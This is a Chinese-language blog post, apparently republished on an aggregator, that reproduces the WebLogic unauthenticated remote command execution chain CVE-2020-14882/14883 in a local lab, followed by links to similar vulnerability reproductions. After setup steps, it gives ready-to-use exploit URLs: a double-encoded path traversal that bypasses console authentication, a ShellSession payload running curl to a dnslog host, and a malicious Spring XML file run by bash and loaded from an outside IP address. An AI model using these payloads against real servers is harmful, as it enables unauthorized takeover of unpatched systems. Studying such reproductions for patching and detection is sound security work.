2. 程式人生 > 實用技巧 >weblogic 未授權命令執行漏洞(CVE-2020-14882,CVE-2020-14883)復現

weblogic 未授權命令執行漏洞(CVE-2020-14882,CVE-2020-14883)復現

阿新 發佈:2020-11-14

漏洞描述

2020年10月29日,360CERT監測發現 Weblogic ConSole HTTP 協議程式碼執行漏洞,該漏洞編號為 CVE-2020-14882,CVE-2020-14883 ,漏洞等級:嚴重,漏洞評分:9.8。
遠端攻擊者可以構造特殊的HTTP請求,在未經身份驗證的情況下接管 WebLogic Server Console,並在 WebLogic Server Console 執行任意程式碼。

影響版本

Oracle Weblogic Server 10.3.6.0.0
Oracle Weblogic Server 12.1.3.0.0
Oracle Weblogic Server 12.2.1.3.0
Oracle Weblogic Server 12.2.1.4.0


Oracle Weblogic Server 14.1.1.0.0

環境搭建

這裡我們測試WebLogic12.2.1.4,java環境是jdk1.8.0_221,自行下載

這裡提供WebLogic12.2.1.4的安裝教程

下載地址:https://www.oracle.com/middleware/technologies/weblogic-server-downloads.html

下載正確的檔案

解壓

用管理員許可權執行

java -jar fmw_12.2.1.4.0_wls_lite_generic.jar

進入安裝介面

下一步

下一步

完成

開始安裝weblogic的web管理

設定口令,然後建立

啟動域

會自動開啟weblogic的啟動介面

我們就進入了weblogic的登入介面(漏洞就是在這個介面觸發的)

漏洞復現

Weblogic是Oracle公司推出的J2EE應用伺服器,CVE-2020-14882允許未授權的使用者繞過管理控制檯的許可權驗證訪問後臺,CVE-2020-14883允許後臺任意使用者通過HTTP協議執行任意命令。使用這兩個漏洞組成的利用鏈,可通過一個GET請求在遠端Weblogic伺服器上以未授權的任意使用者身份執行命令。

CVE-2020-14882:允許未授權的使用者繞過管理控制檯的許可權驗證訪問後臺

遠端攻擊者可以構造特殊的HTTP請求,在未經身份驗證的情況下接管 WebLogic Server Console。
許可權繞過漏洞(CVE-2020-14882),訪問以下URL,未授權訪問到管理後臺頁面(低許可權的使用者):

http://127.0.0.1:7001/console/css/%252e%252e%252fconsole.portal

發現我們現在是低許可權的使用者,無法安裝應用,所以組合下面的CVE-2020-14883 可以繼續利用

CVE-2020-14883:允許後臺任意使用者通過HTTP協議執行任意命令

遠端攻擊者可以構造特殊的HTTP請求,在未經身份驗證的情況下接管 WebLogic Server Console ,並在 WebLogic Server Console 執行任意程式碼。

這個漏洞的利用方式有兩種,一是通過com.tangosol.coherence.mvel2.sh.ShellSession,二是通過com.bea.core.repackaged.springframework.context.support.FileSystemXmlApplicationContext。

方法一:

http://127.0.0.1:7001/console/css/%252e%252e%252fconsole.portal?_nfpb=true&_pageLabel=&handle=com.tangosol.coherence.mvel2.sh.ShellSession(%22java.lang.Runtime.getRuntime().exec(%27curl%20pyxgs4.dnslog.cn%27);%22)

成功執行:

方法二:

一種更為通殺的方法,對於所有Weblogic版本均有效。

但是必須可以出網,要可以訪問到惡意的xml

首先需要構造一個XML檔案,並將其儲存外網(漏洞機或者可訪問的一臺機子上)上,就是要有外網ip

<?xml version="1.0" encoding="UTF-8" ?>
<beans xmlns="http://www.springframework.org/schema/beans"
   xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
   xsi:schemaLocation="http://www.springframework.org/schema/beans http://www.springframework.org/schema/beans/spring-beans.xsd">
    <bean id="pb" class="java.lang.ProcessBuilder" init-method="start">
        <constructor-arg>
          <list>
            <value>bash</value>
            <value>-c</value>
            <value><![CDATA[curl 6zu4z2.dnslog.cn]]></value>
          </list>
        </constructor-arg>
    </bean>
</beans>

然後通過如下URL,即可讓Weblogic載入這個XML,並執行其中的命令:

http://127.0.0.1:7001/console/css/%252e%252e%252fconsole.portal?_nfpb=true&_pageLabel=&handle=com.bea.core.repackaged.springframework.context.support.FileSystemXmlApplicationContext(%22http://64.254.68.38:8085/weblogic/evil.xml%22)

成功回顯

參考文章:

https://blog.csdn.net/god_zzz/article/details/109445728

https://www.cnblogs.com/2rsh0u/p/13911794.html

相關推薦

weblogic 授權命令執行漏洞CVE-2020-14882,CVE-2020-14883復現

漏洞描述 2020年10月29日,360CERT監測發現 Weblogic ConSole HTTP 協議程式碼執行漏洞,該漏洞編號為 CVE-2020-14882,CVE-2020-14883漏洞等級:嚴重,漏洞評分:9.8。遠端攻擊者可以構造特殊的HTTP請求,在未經身

CVE-2020-14882 weblogic 授權命令執行復現

簡介 未經身份驗證的遠端攻擊者可能通過構造特殊的 HTTP GET請求,利用該漏洞在受影響的 WebLogic Server 上執行任意程式碼。

Weblogic授權遠端命令執行漏洞CVE-2020-14882&CVE-2020-14883復現

Weblogic是Oracle公司推出的J2EE應用伺服器,CVE-2020-14882允許未授權的使用者繞過管理控制檯的許可權驗證訪問後臺,CVE-2020-14883允許後臺任意使用者通過HTTP協議執行任意命令。使用這兩個漏洞組成的利用鏈,可通

Weblogic命令執行漏洞CVE-2018-2628復現

一、漏洞環境搭建 CVE-2018-2628影響的軟體版本為: Weblogic 10.3.6.0 Weblogic 12.1.3.0 Weblogic 12.2.1.2

企業安全06-Apache Log4j Server 反序列化命令執行漏洞CVE-2017-5645

CVE-2017-5645 Apache Log4j Server 反序列化命令執行漏洞(CVE-2017-5645 一、漏洞原理 Apache Log4j是一個用於Java的日誌記錄庫,其支援啟動遠端日誌伺服器。Apache Log4j 2.8.2之前的2.x版本中存在安全漏洞。攻

Webmin 命令執行漏洞 CVE-2020-35606--- 復現

漏洞繞過針對 採取的措施 CVE-2019-12840 並將其轉換為新向量。 供應商尚未修復此漏洞

Webmin 命令執行漏洞 CVE-2020-35606---復現

CVE-Mitre 連結 下載 webmin_pu_escape_bypass_rce.rb (Metasploit) 漏洞簡介: 該模組利用 Webmin 1.962 及更低版本中的任意命令執行漏洞。 任何授權“包更新”模組的使用者都可以使用 root 許可權執行任意命令

PHPMailer 命令執行漏洞CVE-2016-10033)復現

前言 PHPMailer沒有聽過,比較好奇,最近正好在學習PHP程式碼審計,所以來複現這個CVE,學習點新東西。

Spring Framework 遠端命令執行漏洞CVE-2022-22965

Spring Framework 遠端命令執行漏洞 CVE-2022-22965  近日,Spring 官方 GitHub issue中提到了關於 Spring Core 的遠端命令執行漏洞,該漏洞廣泛存在於Spring 框架以及衍生的框架中。

Nexus Repository Manager 3 遠端命令執行漏洞CVE-2019-7238

Nexus Repository Manager 3 是一款軟體倉庫,可以用來儲存和分發Maven、NuGET等軟體源倉庫。其3.14.0及之前版本中,存在一處基於OrientDB自定義函式的任意JEXL表示式執行功能,而這處功能存在未授權訪問漏洞,將可以

Nexus Repository Manager 3 遠端命令執行漏洞CVE-2020-10199

Nexus Repository Manager 3 是一款軟體倉庫,可以用來儲存和分發Maven、NuGET等軟體源倉庫。其3.21.1及之前版本中,存在一處任意EL表示式注入漏洞

Imagetragick 命令執行漏洞CVE-2016–3714

ImageMagick是一款使用量很廣的圖片處理程式,很多廠商都呼叫了這個程式進行圖片處理,包括圖片的伸縮、切割、水印、格式轉換等等。但近來有研究者發現,當用戶傳入一個包含『畸形內容』的圖片的時候,就有可能觸發命

gitlist 0.6.0 遠端命令執行漏洞CVE-2018-1000533

gitlist是一款使用PHP開發的圖形化git倉庫檢視工具。在其0.6.0版本及以前,存在一處命令引數注入問題,可以導致遠端命令執行漏洞

GitLab 遠端命令執行漏洞CVE-2021-22205

GitLab是一款Ruby開發的Git專案管理平臺。在11.9以後的GitLab中,因為使用了圖片處理工具ExifTool而受到漏洞CVE-2021-22204的影響,攻擊者可以通過一個未授權的介面上傳一張惡意構造的圖片,進而在GitLab伺服器上執行

Nexus Repository Manager 3 遠端命令執行漏洞CVE-2020-10204

Nexus Repository Manager 3 是一款軟體倉庫,可以用來儲存和分發Maven、NuGET等軟體源倉庫。其3.21.1及之前版本中,存在一處任意EL表示式注入漏洞,這個漏洞CVE-2018-16621的繞過。

Webmin 遠端命令執行漏洞CVE-2019-15107

Webmin是一個用於管理類Unix系統的管理配置工具,具有Web頁面。在其找回密碼頁面中,存在一處無需許可權的命令注入漏洞,通過這個漏洞攻擊者即可以執行任意系統命令

Weblogic遠端命令執行漏洞復現(CVE-2020-14645)

影響版本 Oracle WebLogic Server 10.3.6.0.0 Oracle WebLogic Server 12.1.3.0.0 Oracle WebLogic Server 12.2.1.3.0

Apache Solr 遠端命令執行漏洞復現CVE-2019-0193

一.漏洞介紹 Apache Solr 是一個開源的搜尋伺服器。Solr 使用 Java 語言開發,主要基於 HTTP 和 Apache Lucene 實現。此次漏洞出現在Apache Solr的DataImportHandler,該模組是一個可選但常用的模組,用於從資料庫

CVE-2020-14882 weblogic 授權訪問漏洞

1許可權繞過漏洞CVE-2020-14882,因為CVE-2020-14882授權訪問漏洞是繞過管理控制檯許可權訪問後臺,所以需要存在console控制檯,訪問:ip:port/console

CVE-2018-2628 Weblogic WLS Core Components 反序列化命令執行漏洞

0X00-引言 今晚路燈很亮,好像上面少個人 0X01-環境搭建 靶機:CentOS Linux 7 攻擊機:windows server 2016 && Kail